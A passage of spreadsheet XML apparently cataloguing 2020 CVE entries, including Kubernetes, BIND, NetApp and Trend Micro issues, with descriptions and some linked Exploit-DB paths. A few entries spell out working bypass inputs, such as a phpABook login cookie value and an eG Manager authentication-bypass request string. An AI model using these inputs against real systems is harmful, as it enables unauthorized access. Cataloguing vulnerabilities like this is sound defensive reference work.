    <t>The Global TV application 2.3.2 for Android and 4.7.5 for iOS sends Unencrypted Analytics.</t>
  </si>
  <si>
    <t>CVE-2020-8507</t>
  </si>
  <si>
    <t>The Citytv Video application 4.08.0 for Android and 3.35 for iOS sends Unencrypted Analytics.</t>
  </si>
  <si>
    <t>CVE-2020-8508</t>
  </si>
  <si>
    <t>nsak64.sys in Norman Malware Cleaner 2.08.08 allows users to call arbitrary kernel functions because the passing of function pointers between user and kernel mode is mishandled.</t>
  </si>
  <si>
    <t>CVE-2020-8509</t>
  </si>
  <si>
    <t>Zoho ManageEngine Desktop Central before 10.0.483 allows unauthenticated users to access PDFGenerationServlet, leading to sensitive information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-8510</t>
  </si>
  <si>
    <t>An issue was discovered in phpABook 0.9 Intermediate. On the login page, if one sets a userInfo cookie with the value of admin+1+en (user+perms+lang), one can login as any user without a password.</t>
  </si>
  <si>
    <t>CVE-2020-8511</t>
  </si>
  <si>
    <t>In Artica Pandora FMS through 7.42, Web Admin users can execute arbitrary code by uploading a .php file via the File Repository component, a different issue than CVE-2020-7935 and CVE-2020-8500.</t>
  </si>
  <si>
    <t>CVE-2020-8512</t>
  </si>
  <si>
    <t>In IceWarp Webmail Server through 11.4.4.1, there is XSS in the /webmail/ color parameter.</t>
  </si>
  <si>
    <t>exploits/php/webapps/47988.txt</t>
  </si>
  <si>
    <t>IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting</t>
  </si>
  <si>
    <t>CVE-2020-8514</t>
  </si>
  <si>
    <t>An issue was discovered in Rumpus 8.2.10 on macOS. By crafting a directory name, it is possible to activate JavaScript in the context of the web application after invoking the rename folder functionality.</t>
  </si>
  <si>
    <t>CVE-2020-8515</t>
  </si>
  <si>
    <t>DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.</t>
  </si>
  <si>
    <t>exploits/linux/remote/48268.go</t>
  </si>
  <si>
    <t>Multiple DrayTek Products - Pre-authentication Remote Root Code Execution</t>
  </si>
  <si>
    <t>2020-03-30</t>
  </si>
  <si>
    <t>CVE-2020-8516</t>
  </si>
  <si>
    <t>** DISPUTED ** The daemon in Tor through 0.4.1.8 and 0.4.2.x through 0.4.2.6 does not verify that a rendezvous node is known before attempting to connect to it, which might make it easier for remote attackers to discover circuit information. NOTE: The network team of Tor claims this is an intended behavior and not a vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-8517</t>
  </si>
  <si>
    <t>An issue was discovered in Squid before 4.10. Due to incorrect input validation, the NTLM authentication credentials parser in ext_lm_group_acl may write to memory outside the credentials buffer. On systems with memory access protections, this can result in the helper process being terminated unexpectedly. This leads to the Squid process also terminating and a denial of service for all clients using the proxy.</t>
  </si>
  <si>
    <t>CVE-2020-8518</t>
  </si>
  <si>
    <t>Horde Groupware Webmail Edition 5.2.22 allows injection of arbitrary PHP code via CSV data, leading to remote code execution.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48215.sh</t>
  </si>
  <si>
    <t>Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution</t>
  </si>
  <si>
    <t>2020-03-10</t>
  </si>
  <si>
    <t>CVE-2020-8519</t>
  </si>
  <si>
    <t>SQL injection with the search parameter in Records.php for phpzag live add edit delete data tables records with ajax php mysql</t>
  </si>
  <si>
    <t>CVE-2020-8520</t>
  </si>
  <si>
    <t>SQL injection in order and column parameters in Records.php for phpzag live add edit delete data tables records with ajax php mysql</t>
  </si>
  <si>
    <t>CVE-2020-8521</t>
  </si>
  <si>
    <t>SQL injection with start and length parameters in Records.php for phpzag live add edit delete data tables records with ajax php mysql</t>
  </si>
  <si>
    <t>CVE-2020-8539</t>
  </si>
  <si>
    <t>Kia Motors Head Unit with Software version: SOP.003.30.18.0703, SOP.005.7.181019, and SOP.007.1.191209 may allow an attacker to inject unauthorized commands, by executing the micomd executable deamon, to trigger unintended functionalities. In addition, this executable may be used by an attacker to inject commands to generate CAN frames that are sent into the M-CAN bus (Multimedia CAN bus) of the vehicle.</t>
  </si>
  <si>
    <t>CVE-2020-8540</t>
  </si>
  <si>
    <t>An XML external entity (XXE) vulnerability in Zoho ManageEngine Desktop Central before the 07-Mar-2020 update allows remote unauthenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request.</t>
  </si>
  <si>
    <t>CVE-2020-8541</t>
  </si>
  <si>
    <t>OX App Suite through 7.10.3 allows XXE attacks.</t>
  </si>
  <si>
    <t>CVE-2020-8542</t>
  </si>
  <si>
    <t>OX App Suite through 7.10.3 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2020-8543</t>
  </si>
  <si>
    <t>OX App Suite through 7.10.3 has Improper Input Validation.</t>
  </si>
  <si>
    <t>CVE-2020-8544</t>
  </si>
  <si>
    <t>OX App Suite through 7.10.3 allows SSRF.</t>
  </si>
  <si>
    <t>CVE-2020-8545</t>
  </si>
  <si>
    <t>Global.py in AIL framework 2.8 allows path traversal.</t>
  </si>
  <si>
    <t>CVE-2020-8547</t>
  </si>
  <si>
    <t>phpList 3.5.0 allows type juggling for admin login bypass because == is used instead of === for password hashes, which mishandles hashes that begin with 0e followed by exclusively numerical characters.</t>
  </si>
  <si>
    <t>exploits/php/webapps/47989.php</t>
  </si>
  <si>
    <t>phpList 3.5.0 - Authentication Bypass</t>
  </si>
  <si>
    <t>CVE-2020-8548</t>
  </si>
  <si>
    <t>massCode 1.0.0-alpha.6 allows XSS via crafted Markdown text, with resultant remote code execution (because nodeIntegration in webPreferences is true).</t>
  </si>
  <si>
    <t>CVE-2020-8549</t>
  </si>
  <si>
    <t>Stored XSS in the Strong Testimonials plugin before 2.40.1 for WordPress can result in an attacker performing malicious actions such as stealing session tokens.</t>
  </si>
  <si>
    <t>CVE-2020-8551</t>
  </si>
  <si>
    <t>The Kubelet component in versions 1.15.0-1.15.9, 1.16.0-1.16.6, and 1.17.0-1.17.2 has been found to be vulnerable to a denial of service attack via the kubelet API, including the unauthenticated HTTP read-only API typically served on port 10255, and the authenticated HTTPS API typically served on port 10250.</t>
  </si>
  <si>
    <t>CVE-2020-8552</t>
  </si>
  <si>
    <t>The Kubernetes API server component in versions prior to 1.15.9, 1.16.0-1.16.6, and 1.17.0-1.17.2 has been found to be vulnerable to a denial of service attack via successful API requests.</t>
  </si>
  <si>
    <t>CVE-2020-8553</t>
  </si>
  <si>
    <t>The Kubernetes ingress-nginx component prior to version 0.28.0 allows a user with the ability to create namespaces and to read and create ingress objects to overwrite the password file of another ingress which uses nginx.ingress.kubernetes.io/auth-type: basic and which has a hyphenated namespace or secret name.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-8554</t>
  </si>
  <si>
    <t>Kubernetes API server in all versions allow an attacker who is able to create a ClusterIP service and set the spec.externalIPs field, to intercept traffic to that IP address. Additionally, an attacker who is able to patch the status (which is considered a privileged operation and should not typically be granted to users) of a LoadBalancer service can set the status.loadBalancer.ingress.ip to similar effect.</t>
  </si>
  <si>
    <t>CVE-2020-8555</t>
  </si>
  <si>
    <t>The Kubernetes kube-controller-manager in versions v1.0-1.14, versions prior to v1.15.12, v1.16.9, v1.17.5, and version v1.18.0 are vulnerable to a Server Side Request Forgery (SSRF) that allows certain authorized users to leak up to 500 bytes of arbitrary information from unprotected endpoints within the master's host network (such as link-local or loopback services).</t>
  </si>
  <si>
    <t>CVE-2020-8557</t>
  </si>
  <si>
    <t>The Kubernetes kubelet component in versions 1.1-1.16.12, 1.17.0-1.17.8 and 1.18.0-1.18.5 do not account for disk usage by a pod which writes to its own /etc/hosts file. The /etc/hosts file mounted in a pod by kubelet is not included by the kubelet eviction manager when calculating ephemeral storage usage by a pod. If a pod writes a large amount of data to the /etc/hosts file, it could fill the storage space of the node and cause the node to fail.</t>
  </si>
  <si>
    <t>CVE-2020-8558</t>
  </si>
  <si>
    <t>The Kubelet and kube-proxy components in versions 1.1.0-1.16.10, 1.17.0-1.17.6, and 1.18.0-1.18.3 were found to contain a security issue which allows adjacent hosts to reach TCP and UDP services bound to 127.0.0.1 running on the node or in the node's network namespace. Such a service is generally thought to be reachable only by other processes on the same host, but due to this defeect, could be reachable by other hosts on the same LAN as the node, or by containers running on the same node as the service.</t>
  </si>
  <si>
    <t>CVE-2020-8559</t>
  </si>
  <si>
    <t>The Kubernetes kube-apiserver in versions v1.6-v1.15, and versions prior to v1.16.13, v1.17.9 and v1.18.6 are vulnerable to an unvalidated redirect on proxied upgrade requests that could allow an attacker to escalate privileges from a node compromise to a full cluster compromise.</t>
  </si>
  <si>
    <t>CVE-2020-8561</t>
  </si>
  <si>
    <t>A security issue was discovered in Kubernetes where actors that control the responses of MutatingWebhookConfiguration or ValidatingWebhookConfiguration requests are able to redirect kube-apiserver requests to private networks of the apiserver. If that user can view kube-apiserver logs when the log level is set to 10, they can view the redirected responses and headers in the logs.</t>
  </si>
  <si>
    <t>CVE-2020-8562</t>
  </si>
  <si>
    <t>As mitigations to a report from 2019 and CVE-2020-8555, Kubernetes attempts to prevent proxied connections from accessing link-local or localhost networks when making user-driven connections to Services, Pods, Nodes, or StorageClass service providers. As part of this mitigation Kubernetes does a DNS name resolution check and validates that response IPs are not in the link-local (169.254.0.0/16) or localhost (127.0.0.0/8) range. Kubernetes then performs a second DNS resolution without validation for the actual connection. If a non-standard DNS server returns different non-cached responses, a user may be able to bypass the proxy IP restriction and access private networks on the control plane.</t>
  </si>
  <si>
    <t>CVE-2020-8563</t>
  </si>
  <si>
    <t>In Kubernetes clusters using VSphere as a cloud provider, with a logging level set to 4 or above, VSphere cloud credentials will be leaked in the cloud controller manager's log. This affects &lt; v1.19.3.</t>
  </si>
  <si>
    <t>CVE-2020-8564</t>
  </si>
  <si>
    <t>In Kubernetes clusters using a logging level of at least 4, processing a malformed docker config file will result in the contents of the docker config file being leaked, which can include pull secrets or other registry credentials. This affects &lt; v1.19.3, &lt; v1.18.10, &lt; v1.17.13.</t>
  </si>
  <si>
    <t>CVE-2020-8565</t>
  </si>
  <si>
    <t>In Kubernetes, if the logging level is set to at least 9, authorization and bearer tokens will be written to log files. This can occur both in API server logs and client tool output like kubectl. This affects &lt;= v1.19.3, &lt;= v1.18.10, &lt;= v1.17.13, &lt; v1.20.0-alpha2.</t>
  </si>
  <si>
    <t>CVE-2020-8566</t>
  </si>
  <si>
    <t>In Kubernetes clusters using Ceph RBD as a storage provisioner, with logging level of at least 4, Ceph RBD admin secrets can be written to logs. This occurs in kube-controller-manager's logs during provisioning of Ceph RBD persistent claims. This affects &lt; v1.19.3, &lt; v1.18.10, &lt; v1.17.13.</t>
  </si>
  <si>
    <t>CVE-2020-8567</t>
  </si>
  <si>
    <t>Kubernetes Secrets Store CSI Driver Vault Plugin prior to v0.0.6, Azure Plugin prior to v0.0.10, and GCP Plugin prior to v0.2.0 allow an attacker who can create specially-crafted SecretProviderClass objects to write to arbitrary file paths on the host filesystem, including /var/lib/kubelet/pods.</t>
  </si>
  <si>
    <t>CVE-2020-8568</t>
  </si>
  <si>
    <t>Kubernetes Secrets Store CSI Driver versions v0.0.15 and v0.0.16 allow an attacker who can modify a SecretProviderClassPodStatus/Status resource the ability to write content to the host filesystem and sync file contents to Kubernetes Secrets. This includes paths under var/lib/kubelet/pods that contain other Kubernetes Secrets.</t>
  </si>
  <si>
    <t>CVE-2020-8569</t>
  </si>
  <si>
    <t>Kubernetes CSI snapshot-controller prior to v2.1.3 and v3.0.2 could panic when processing a VolumeSnapshot custom resource when: - The VolumeSnapshot referenced a non-existing PersistentVolumeClaim and the VolumeSnapshot did not reference any VolumeSnapshotClass. - The snapshot-controller crashes, is automatically restarted by Kubernetes, and processes the same VolumeSnapshot custom resource after the restart, entering an endless crashloop. Only the volume snapshot feature is affected by this vulnerability. When exploited, users can’t take snapshots of their volumes or delete the snapshots. All other Kubernetes functionality is not affected.</t>
  </si>
  <si>
    <t>CVE-2020-8570</t>
  </si>
  <si>
    <t>Kubernetes Java client libraries in version 10.0.0 and versions prior to 9.0.1 allow writes to paths outside of the current directory when copying multiple files from a remote pod which sends a maliciously crafted archive. This can potentially overwrite any files on the system of the process executing the client code.</t>
  </si>
  <si>
    <t>CVE-2020-8571</t>
  </si>
  <si>
    <t>StorageGRID (formerly StorageGRID Webscale) versions 10.0.0 through 11.3 prior to 11.2.0.8 and 11.3.0.4 are susceptible to a vulnerability which allows an unauthenticated remote attacker to cause a Denial of Service (DoS).</t>
  </si>
  <si>
    <t>CVE-2020-8572</t>
  </si>
  <si>
    <t>Element OS prior to version 12.0 and Element HealthTools prior to version 2020.04.01.04 are susceptible to a vulnerability which when successfully exploited could lead to disclosure of sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-8573</t>
  </si>
  <si>
    <t>The NetApp HCI H610C, H615C and H610S Baseboard Management Controllers (BMC) are shipped with a documented default account and password that should be changed during the initial node setup. During upgrades to Element 11.8 and 12.0 or the Compute Firmware Bundle 12.2.92 the BMC account password on the H610C, H615C and H610S platforms is reset to the default documented value which could allow remote attackers to cause a Denial of Service (DoS).</t>
  </si>
  <si>
    <t>CVE-2020-8574</t>
  </si>
  <si>
    <t>Active IQ Unified Manager for Linux versions prior to 9.6 ship with the Java Management Extension Remote Method Invocation (JMX RMI) service enabled allowing unauthorized code execution to local users.</t>
  </si>
  <si>
    <t>CVE-2020-8575</t>
  </si>
  <si>
    <t>Active IQ Unified Manager for VMware vSphere and Windows versions prior to 9.5 are susceptible to a vulnerability which allows administrative users to cause Denial of Service (DoS).</t>
  </si>
  <si>
    <t>CVE-2020-8576</t>
  </si>
  <si>
    <t>Clustered Data ONTAP versions prior to 9.3P19, 9.5P14, 9.6P9 and 9.7 are susceptible to a vulnerability which when successfully exploited could lead to addition or modification of data or disclosure of sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-8577</t>
  </si>
  <si>
    <t>SANtricity OS Controller Software versions 11.50.1 and higher are susceptible to a vulnerability which could allow an attacker to discover sensitive information by intercepting its transmission within an https session.</t>
  </si>
  <si>
    <t>CVE-2020-8578</t>
  </si>
  <si>
    <t>Clustered Data ONTAP versions prior to 9.3P20 are susceptible to a vulnerability which could allow an attacker to discover node names via AutoSupport bundles even when the –remove-private-data parameter is set to true.</t>
  </si>
  <si>
    <t>CVE-2020-8579</t>
  </si>
  <si>
    <t>Clustered Data ONTAP versions 9.7 through 9.7P7 are susceptible to a vulnerability which allows an attacker with access to an intercluster LIF to cause a Denial of Service (DoS).</t>
  </si>
  <si>
    <t>CVE-2020-8580</t>
  </si>
  <si>
    <t>SANtricity OS Controller Software versions 11.30 and higher are susceptible to a vulnerability which allows an unauthenticated attacker with access to the system to cause a Denial of Service (DoS).</t>
  </si>
  <si>
    <t>CVE-2020-8581</t>
  </si>
  <si>
    <t>Clustered Data ONTAP versions prior to 9.3P20 and 9.5 are susceptible to a vulnerability which could allow an authenticated but unauthorized attacker to overwrite arbitrary data when VMware vStorage support is enabled.</t>
  </si>
  <si>
    <t>CVE-2020-8582</t>
  </si>
  <si>
    <t>Element Software versions prior to 12.2 and HCI versions prior to 1.8P1 are susceptible to a vulnerability which could allow an authenticated user to view sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-8583</t>
  </si>
  <si>
    <t>Element Software versions prior to 12.2 and HCI versions prior to 1.8P1 are susceptible to a vulnerability which could allow an attacker to discover sensitive information by intercepting its transmission within an https session.</t>
  </si>
  <si>
    <t>CVE-2020-8584</t>
  </si>
  <si>
    <t>Element OS versions prior to 1.8P1 and 12.2 are susceptible to a vulnerability that could allow an unauthenticated remote attacker to perform arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-8585</t>
  </si>
  <si>
    <t>OnCommand Unified Manager Core Package versions prior to 5.2.5 may disclose sensitive account information to unauthorized users via the use of PuTTY Link (plink).</t>
  </si>
  <si>
    <t>CVE-2020-8587</t>
  </si>
  <si>
    <t>OnCommand System Manager 9.x versions prior to 9.3P20 and 9.4 prior to 9.4P3 are susceptible to a vulnerability that could allow HTTP clients to cache sensitive responses making them accessible to an attacker who has access to the system where the client runs.</t>
  </si>
  <si>
    <t>CVE-2020-8588</t>
  </si>
  <si>
    <t>Clustered Data ONTAP versions prior to 9.3P20 and 9.5P15 are susceptible to a vulnerability which could allow unauthorized tenant users to discover the existence of data on other Storage Virtual Machines (SVMs).</t>
  </si>
  <si>
    <t>CVE-2020-8589</t>
  </si>
  <si>
    <t>Clustered Data ONTAP versions prior to 9.3P20 and 9.5P15 are susceptible to a vulnerability which could allow unauthorized tenant users to discover the names of other Storage Virtual Machines (SVMs) and filenames on those SVMs.</t>
  </si>
  <si>
    <t>CVE-2020-8590</t>
  </si>
  <si>
    <t>Clustered Data ONTAP versions prior to 9.1P18 and 9.3P12 are susceptible to a vulnerability which could allow an attacker to discover node names via AutoSupport bundles even when the –remove-private-data parameter is set to true.</t>
  </si>
  <si>
    <t>CVE-2020-8591</t>
  </si>
  <si>
    <t>eG Manager 7.1.2 allows authentication bypass via a com.egurkha.EgLoginServlet?uname=admin&amp;upass=&amp;accessKey=eGm0n1t0r request.</t>
  </si>
  <si>
    <t>CVE-2020-8592</t>
  </si>
  <si>
    <t>eG Manager 7.1.2 allows SQL Injection via the user parameter to com.eg.LoginHelperServlet (aka the Forgot Password feature).</t>
  </si>
  <si>
    <t>CVE-2020-8594</t>
  </si>
  <si>
    <t>The Ninja Forms plugin 3.4.22 for WordPress has Multiple Stored XSS vulnerabilities via ninja_forms[recaptcha_site_key], ninja_forms[recaptcha_secret_key], ninja_forms[recaptcha_lang], or ninja_forms[date_format].</t>
  </si>
  <si>
    <t>CVE-2020-8595</t>
  </si>
  <si>
    <t>Istio versions 1.2.10 (End of Life) and prior, 1.3 through 1.3.7, and 1.4 through 1.4.3 allows authentication bypass. The Authentication Policy exact-path matching logic can allow unauthorized access to HTTP paths even if they are configured to be only accessed after presenting a valid JWT token. For example, an attacker can add a ? or # character to a URI that would otherwise satisfy an exact-path match.</t>
  </si>
  <si>
    <t>CVE-2020-8596</t>
  </si>
  <si>
    <t>participants-database.php in the Participants Database plugin 1.9.5.5 and previous versions for WordPress has a time-based SQL injection vulnerability via the ascdesc, list_filter_count, or sortBy parameters. It is possible to exfiltrate data and potentially execute code (if certain conditions are met).</t>
  </si>
  <si>
    <t>CVE-2020-8597</t>
  </si>
  <si>
    <t>eap.c in pppd in ppp 2.4.2 through 2.4.8 has an rhostname buffer overflow in the eap_request and eap_response functions.</t>
  </si>
  <si>
    <t>CVE-2020-8598</t>
  </si>
  <si>
    <t>Trend Micro Apex One (2019), OfficeScan XG and Worry-Free Business Security (9.0, 9.5, 10.0) server contains a vulnerable service DLL file that could allow a remote attacker to execute arbitrary code on affected installations with SYSTEM level privileges. Authentication is not required to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-8599</t>
  </si>
  <si>
    <t>Trend Micro Apex One (2019) and OfficeScan XG server contain a vulnerable EXE file that could allow a remote attacker to write arbitrary data to an arbitrary path on affected installations and bypass ROOT login. Authentication is not required to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-8600</t>
  </si>
  <si>
    <t>Trend Micro Worry-Free Business Security (9.0, 9.5, 10.0) is affected by a directory traversal vulnerability that could allow an attacker to manipulate a key file to bypass authentication.</t>
  </si>
  <si>
    <t>CVE-2020-8601</t>
  </si>
  <si>
    <t>Trend Micro Vulnerability Protection 2.0 is affected by a vulnerability that could allow an attack to use the product installer to load other DLL files located in the same directory.</t>
  </si>
  <si>
    <t>CVE-2020-8602</t>
  </si>
  <si>
    <t>A vulnerability in the management consoles of Trend Micro Deep Security 10.0-12.0 and Trend Micro Vulnerability Protection 2.0 SP2 may allow an authenticated attacker with full control privileges to bypass file integrity checks, leading to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-8603</t>
  </si>
  <si>
    <t>A cross-site scripting vulnerability (XSS) in Trend Micro InterScan Web Security Virtual Appliance 6.5 may allow a remote attacker to tamper with the web interface of affected installations. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2020-8604</t>
  </si>
  <si>
    <t>A vulnerability in Trend Micro InterScan Web Security Virtual Appliance 6.5 may allow remote attackers to disclose sensitive informatoin on affected installations.</t>
  </si>
  <si>
    <t>CVE-2020-8605</t>
  </si>
  <si>
    <t>A vulnerability in Trend Micro InterScan Web Security Virtual Appliance 6.5 may allow remote attackers to execute arbitrary code on affected installations. Authentication is required to exploit this vulnerability.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/48667.rb</t>
  </si>
  <si>
    <t>Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)</t>
  </si>
  <si>
    <t>2020-07-14</t>
  </si>
  <si>
    <t>CVE-2020-8606</t>
  </si>
  <si>
    <t>A vulnerability in Trend Micro InterScan Web Security Virtual Appliance 6.5 may allow remote attackers to bypass authentication on affected installations of Trend Micro InterScan Web Security Virtual Appliance.</t>
  </si>
  <si>
    <t>CVE-2020-8607</t>
  </si>
  <si>
    <t>An input validation vulnerability found in multiple Trend Micro products utilizing a particular version of a specific rootkit protection driver could allow an attacker in user-mode with administrator permissions to abuse the driver to modify a kernel address that may cause a system crash or potentially lead to code execution in kernel mode. An attacker must already have obtained administrator access on the target machine (either legitimately or via a separate unrelated attack) to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-8608</t>
  </si>
  <si>
    <t>In libslirp 4.1.0, as used in QEMU 4.2.0, tcp_subr.c misuses snprintf return values, leading to a buffer overflow in later code.</t>
  </si>
  <si>
    <t>CVE-2020-8611</t>
  </si>
  <si>
    <t>In Progress MOVEit Transfer 2019.1 before 2019.1.4 and 2019.2 before 2019.2.1, multiple SQL Injection vulnerabilities have been found in the REST API that could allow an authenticated attacker to gain unauthorized access to MOVEit Transfer's database via the REST API. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database in addition to executing SQL statements that alter or destroy database elements.</t>
  </si>
  <si>
    <t>CVE-2020-8612</t>
  </si>
  <si>
    <t>In Progress MOVEit Transfer 2019.1 before 2019.1.4 and 2019.2 before 2019.2.1, a REST API endpoint failed to adequately sanitize malicious input, which could allow an authenticated attacker to execute arbitrary code in a victim's browser, aka XSS.</t>
  </si>
  <si>
    <t>CVE-2020-8614</t>
  </si>
  <si>
    <t>An issue was discovered on Askey AP4000W TDC_V1.01.003 devices. An attacker can perform Remote Code Execution (RCE) by sending a specially crafted network packer to the bd_svr service listening on TCP port 54188.</t>
  </si>
  <si>
    <t>CVE-2020-8615</t>
  </si>
  <si>
    <t>A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).</t>
  </si>
  <si>
    <t>exploits/php/webapps/48151.txt</t>
  </si>
  <si>
    <t>WordPress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)</t>
  </si>
  <si>
    <t>CVE-2020-8616</t>
  </si>
  <si>
    <t>A malicious actor who intentionally exploits this lack of effective limitation on the number of fetches performed when processing referrals can, through the use of specially crafted referrals, cause a recursing server to issue a very large number of fetches in an attempt to process the referral. This has at least two potential effects: The performance of the recursing server can potentially be degraded by the additional work required to perform these fetches, and The attacker can exploit this behavior to use the recursing server as a reflector in a reflection attack with a high amplification factor.</t>
  </si>
  <si>
    <t>CVE-2020-8617</t>
  </si>
  <si>
    <t>Using a specially-crafted message, an attacker may potentially cause a BIND server to reach an inconsistent state if the attacker knows (or successfully guesses) the name of a TSIG key used by the server. Since BIND, by default, configures a local session key even on servers whose configuration does not otherwise make use of it, almost all current BIND servers are vulnerable. In releases of BIND dating from March 2018 and after, an assertion check in tsig.c detects this inconsistent state and deliberately exits. Prior to the introduction of the check the server would continue operating in an inconsistent state, with potentially harmful results.</t>
  </si>
  <si>
    <t>exploits/multiple/dos/48521.py</t>
  </si>
  <si>
    <t>BIND - 'TSIG' Denial of Service</t>
  </si>
  <si>
    <t>2020-05-20</t>
  </si>
  <si>
    <t>CVE-2020-8618</t>
  </si>
  <si>
    <t>An attacker who is permitted to send zone data to a server via zone transfer can exploit this to intentionally trigger the assertion failure with a specially constructed zone, denying service to clients.</t>
  </si>
  <si>
    <t>CVE-2020-8619</t>
  </si>
  <si>
    <t>In ISC BIND9 versions BIND 9.11.14 -&gt; 9.11.19, BIND 9.14.9 -&gt; 9.14.12, BIND 9.16.0 -&gt; 9.16.3, BIND Supported Preview Edition 9.11.14-S1 -&gt; 9.11.19-S1: Unless a nameserver is providing authoritative service for one or more zones and at least one zone contains an empty non-terminal entry containing an asterisk ("*") character, this defect cannot be encountered. A would-be attacker who is allowed to change zone content could theoretically introduce such a record in order to exploit this condition to cause denial of service, though we consider the use of this vector unlikely because any such attack would require a significant privilege level and be easily traceable.</t>
  </si>
  <si>
    <t>CVE-2020-8620</t>
  </si>
  <si>
    <t>In BIND 9.15.6 -&gt; 9.16.5, 9.17.0 -&gt; 9.17.3, An attacker who can establish a TCP connection with the server and send data on that connection can exploit this to trigger the assertion failure, causing the server to exit.</t>
  </si>
  <si>
    <t>CVE-2020-8621</t>
  </si>
  <si>
    <t>In BIND 9.14.0 -&gt; 9.16.5, 9.17.0 -&gt; 9.17.3, If a server is configured with both QNAME minimization and 'forward first' then an attacker who can send queries to it may be able to trigger the condition that will cause the server to crash. Servers that 'forward only' are not affected.</t>
  </si>
  <si>
    <t>CVE-2020-8622</t>
  </si>
  <si>
    <t>In BIND 9.0.0 -&gt; 9.11.21, 9.12.0 -&gt; 9.16.5, 9.17.0 -&gt; 9.17.3, also affects 9.9.3-S1 -&gt; 9.11.21-S1 of the BIND 9 Supported Preview Edition, An attacker on the network path for a TSIG-signed request, or operating the server receiving the TSIG-signed request, could send a truncated response to that request, triggering an assertion failure, causing the server to exit. Alternately, an off-path attacker would have to correctly guess when a TSIG-signed request was sent, along with other characteristics of the packet and message, and spoof a truncated response to trigger an assertion failure, causing the server to exit.</t>
  </si>
  <si>
    <t>CVE-2020-8623</t>
  </si>
  <si>
    <t>In BIND 9.10.0 -&gt; 9.11.21, 9.12.0 -&gt; 9.16.5, 9.17.0 -&gt; 9.17.3, also affects 9.10.5-S1 -&gt; 9.11.21-S1 of the BIND 9 Supported Preview Edition, An attacker that can reach a vulnerable system with a specially crafted query packet can trigger a crash. To be vulnerable, the system must: * be running BIND that was built with "--enable-native-pkcs11" * be signing one or more zones with an RSA key * be able to receive queries from a possible attacker</t>
  </si>
  <si>
    <t>CVE-2020-8624</t>
  </si>
  <si>
    <t>In BIND 9.9.12 -&gt; 9.9.13, 9.10.7 -&gt; 9.10.8, 9.11.3 -&gt; 9.11.21, 9.12.1 -&gt; 9.16.5, 9.17.0 -&gt; 9.17.3, also affects 9.9.12-S1 -&gt; 9.9.13-S1, 9.11.3-S1 -&gt; 9.11.21-S1 of the BIND 9 Supported Preview Edition, An attacker who has been granted privileges to change a specific subset of the zone's content could abuse these unintended additional privileges to update other contents of the zone.</t>
  </si>
  <si>
    <t>CVE-2020-8625</t>
  </si>
  <si>
    <t>BIND servers are vulnerable if they are running an affected version and are configured to use GSS-TSIG features. In a configuration which uses BIND's default settings the vulnerable code path is not exposed, but a server can be rendered vulnerable by explicitly setting valid values for the tkey-gssapi-keytab or tkey-gssapi-credentialconfiguration options. Although the default configuration is not vulnerable, GSS-TSIG is frequently used in networks where BIND is integrated with Samba, as well as in mixed-server environments that combine BIND servers with Active Directory domain controllers. The most likely outcome of a successful exploitation of the vulnerability is a crash of the named process. However, remote code execution, while unproven, is theoretically possible. Affects: BIND 9.5.0 -&gt; 9.11.27, 9.12.0 -&gt; 9.16.11, and versions BIND 9.11.3-S1 -&gt; 9.11.27-S1 and 9.16.8-S1 -&gt; 9.16.11-S1 of BIND Supported Preview Edition. Also release versions 9.17.0 -&gt; 9.17.1 of the BIND 9.17 development branch</t>
  </si>
  <si>
    <t>CVE-2020-8631</t>
  </si>
  <si>
    <t>cloud-init through 19.4 relies on Mersenne Twister for a random password, which makes it easier for attackers to predict passwords, because rand_str in cloudinit/util.py calls the random.choice function.</t>
  </si>
  <si>
    <t>CVE-2020-8632</t>
  </si>
  <si>
    <t>In cloud-init through 19.4, rand_user_password in cloudinit/config/cc_set_passwords.py has a small default pwlen value, which makes it easier for attackers to guess passwords.</t>
  </si>
  <si>
    <t>CVE-2020-8633</t>
  </si>
  <si>
    <t>An issue was discovered in Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7. When grantors revoked a shared calendar in Outlook, the calendar stayed mounted and accessible.</t>
  </si>
  <si>
    <t>CVE-2020-8634</t>
  </si>
  <si>
    <t>Wing FTP Server v6.2.3 for Linux, macOS, and Solaris sets insecure permissions on files modified within the HTTP file management interface, resulting in files being saved with world-readable and world-writable permissions. If a sensitive system file were edited this way, a low-privilege user may escalate privileges to root.</t>
  </si>
  <si>
    <t>CVE-2020-8635</t>
  </si>
  <si>
    <t>Wing FTP Server v6.2.3 for Linux, macOS, and Solaris sets insecure permissions on installation directories and configuration files. This allows local users to arbitrarily create FTP users with full privileges, and escalate privileges within the operating system by modifying system files.</t>
  </si>
  <si>
    <t>CVE-2020-8636</t>
  </si>
  <si>
    <t>An issue was discovered in OpServices OpMon 9.3.2 that allows Remote Code Execution .</t>
  </si>
  <si>
    <t>CVE-2020-8637</t>
  </si>
